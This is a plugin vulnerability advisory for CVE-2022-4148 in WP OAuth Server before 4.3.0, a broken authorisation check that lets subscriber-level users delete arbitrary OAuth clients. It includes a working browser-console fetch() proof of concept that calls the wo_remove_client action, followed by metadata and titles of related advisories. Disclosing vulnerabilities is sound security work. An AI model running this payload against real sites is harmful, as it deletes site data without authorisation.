WP OAuth Server < 4.3.0 – Subscriber+ Arbitrary Client Deletion | CVE 2022-4148 | Plugin Vulnerabilities

Description

The plugin has a flawed CSRF and authorisation check when deleting a client, which could allow any authenticated users, such as subscriber to delete arbitrary client.

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as any authenticated users, such as subscriber, this will delete the client with ID 123

fetch('/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=wo_remove_client&client_id=123',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

Affects Plugins

oauth2-provider

Fixed in 4.3.0

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website

https://lana.codes/

Submitter twitter

Verified

Yes

WPVDB ID

be9b25c8-b0d7-4c22-81ff-e41650a4ed41

Timeline

Publicly Published

2023-02-21 (about 2 years ago)

Added

2023-02-21 (about 2 years ago)

Last Updated

2023-03-27 (about 2 years ago)

Other

Published

Title

Published

2025-03-31

Title

Ni WooCommerce Product Enquiry <= 4.1.8 - Missing Authorization

Published

2025-01-16

Title

Minterpress <= 1.0.5 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Content Deletion

Published

2026-01-07

Title

Docket Cache < 24.07.05 - Missing Authorization

Published

2024-02-12

Title

SKT Page Builder < 4.2 - Missing Authorization to Authenticated(Subscriber+) Content Injection

Published

2024-06-11

Title

InstaWP Connect – 1-click WP Staging & Migration < 0.1.0.39 - Missing Authorization to Unauthenticated API setup/Arbitrary Options Update/Administrative User Creation